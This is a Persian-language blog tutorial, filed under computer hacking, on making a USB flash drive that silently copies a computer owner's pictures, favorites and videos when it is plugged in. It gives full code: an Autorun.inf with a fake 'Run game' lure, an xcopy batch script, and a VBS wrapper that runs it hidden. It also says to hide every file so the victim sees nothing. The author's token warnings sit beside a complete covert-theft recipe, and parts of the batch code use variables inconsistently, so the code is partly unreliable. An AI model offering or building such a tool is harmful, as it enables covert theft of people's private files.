کپی خودکار فایل به حافظه فلش از روی رایانه بدون سر و صدا!

منتشر شده در ۱۳۹۴/۰۳/۱۲ در دستۀ بازیابی اطلاعات،هک کامپیوتر ۵۷ دیدگاه

نمی‌دانم برای چه می‌خواهید این ترفند را یاد بگیرید؟! آیا می‌خواهید فایل‌ها و اطلاعات حساس و شخصی دوست‌تان را کِش روید؟ یا کسی را اذیت کنید؟ شاید هم شغل‌تان بی ارتبابط با خدمات کامپیوتری نیست و می‌خواهید با خودکار سازی کپی کردن فایل‌های سیستم مشتری‌تان، از انجام کارهای تکراری راحت شوید. به هر حال اگر می‌خواهید ترفند کپی خودکار فایل به حافظه فلش از روی رایانه بدون سر و صدا را یاد بگیرید، باید این مطلب را تا انتها بخوانید. ولی من با عنوان بدون سر و صدا مشکل دارم. فکر نمی‌کنید که خواسته باشید جاسوسی کنید؟ نه؟ پیشنهاد می‌کنم که این کار را نکنید. ولی تبعات این کار با خود شماست.

کپی خودکار فایل به حافظه فلش از روی رایانه بدون سر و صدا!

کپی فایل از روی کامپیوتر به فلش

توضیحات ابتدایی این ترفند، حاکی از این است که با این ترفند شما می‌توانید با اتصال یک حافظۀ Flash به یک رایانه، اطلاعات شخصی موجود در قسمتی از حافظۀ سخت آن را به صورت خودکار روی Flash خودتان کپی کنید. این کار تا حد زیادی به صورت مخفی انجام می‌شود. ولی اگر فلش شما دارای لامپ LED باشد، با چشمک زدن آن عملیات تا حدی لو می‌رود! پس حافظۀ فلشی که برای این کار انتخاب می‌کنید، می‌تواند بسته به حجم اطلاعاتی که قرار است روی آن کپی شود، متفاوت باشد.

در ابتدا باید چند تا فایل بسازید و آن را روی حافظۀ فلش خود قرار دهید. این چند تا پرونده بدین قرار است:

۱- یک فایل با نام Autorun.inf بسازید و کدهای زیر را درون آن قرار دهید.

[autorun]
icon=drive.ico
open=launch.bat
action=Click ok to Run game for Windows
shell\open\command=launch.bat

ساخت پروندۀ Autorun.inf

ساخت پروندۀ Autorun.inf

نکاتی که برای ساخت این پرونده باید در نظر داشته باشید، یکی این است که حتماً باید پسوند فایل Autotun.inf را دقیقاً .inf تعیین کنید. پس زمان ذخیره سازی سند از طریق نرم افزار notepad باید هر آنچه به غیر از نام و پسوند این فایل، در جعبۀ File name وجود دارد را حذف کنید.

اگر خواسته باشم توضیحی راجع به کد داخل فایل Autorun.inf بدهم، باید گفت قسمت icon=drive.ico یک آیکونی را برای فلش شما در نظر می‌گیرد که عکس مورد نظر را با اندازۀ ۳۲×۳۲ پیکسل و با پسوند ico یا png باشد و باید آن را با نام drive.ico در مسیر اصلی از فلش خود قرار دهید.

۲- یک فایل دیگر بسازید و نام آن را file.bat بگذارید وکدهای زیر را درون آن کپی کنید. کار این فایل کپی کردن اطلاعات کاربر به داخل فلش اتصالی به رایانه است.

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls

ساخت فایل file.bat

ساخت فایل file.bat

یک نکته در مورد کدهای این فایل وجود دارد و آن این است که؛ دستور %backupcmd% در کد بالا، عملیت کپی از مسیرهای تعیین شده در محل مورد نظر را انجام می‌دهد و شما می‌توانید این قسمت از کد را سفارشی سازی کنید. مثلاً در بالا از سه قسمت (پوشه) pictures و Favorites و videos کپی می‌گیرد و به داخل پوشۀ all با زیر شاخه‌هایی تعیین شده قرار می‌دهد.

۳- ساخت یک فایل vb برای اجرای فایل batch یه عنوان یک فایل مخفی:
یک فایل دیگر با نام invisible.vbs بسازید و کد سادۀ زیر را درونش قرار دهید.

CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False

ساخت فایل invisible.vbs

ساخت فایل invisible.vbs

۴- ساخت یک فایل batch برای اجرای vb script و file.batch:
یک فایل دیگر با نام launch.bat بسازید و کد زیر را درونش قرار دهید.

wscript.exe \invisible.vbs file.bat

ساخت فایل launch.bat

ساخت فایل launch.bat

۵- حالا تمامی این فایل‌ها را اگر درون درایو فلش قرار ندادید، همه را درون آن Copy کنید و یک پوشه به نام all بسازید تا فایل‌هایی که کپی می‌شوند درون آن قرار گیرند.

ساخت پوشۀ all

ساخت پوشۀ all

حالا کافی است تمامی فایل‌ها و پوشه‌ای را که ساختید را به حالت مخفی یا hidden تبدیل کنید تا دوست شما که می‌خواهد فلش را به رایانۀ خودش وصل کند، از محتویات داخل آن موردی را نبیند. برای مخفی کردن فایل یا پوشه به دیگر مقالات سایت آموزش کامپیوتر مراجعه نمایید.

حالا برای امتحان هم که شده، فلش را به یک رایانه متصل کنید تا ببینید عملیات سرقت اطلاعات را به درستی انجام می‌دهد یا خیر!! این ترفند به نوعی هک رایانه تلقی می‌شود. پس در استفاده کردن از آن دقت کنید؛ مردم آزاری کار خوبی نیست :) :!:

منبع: instructables.com

4.3/5 - (56 امتیاز)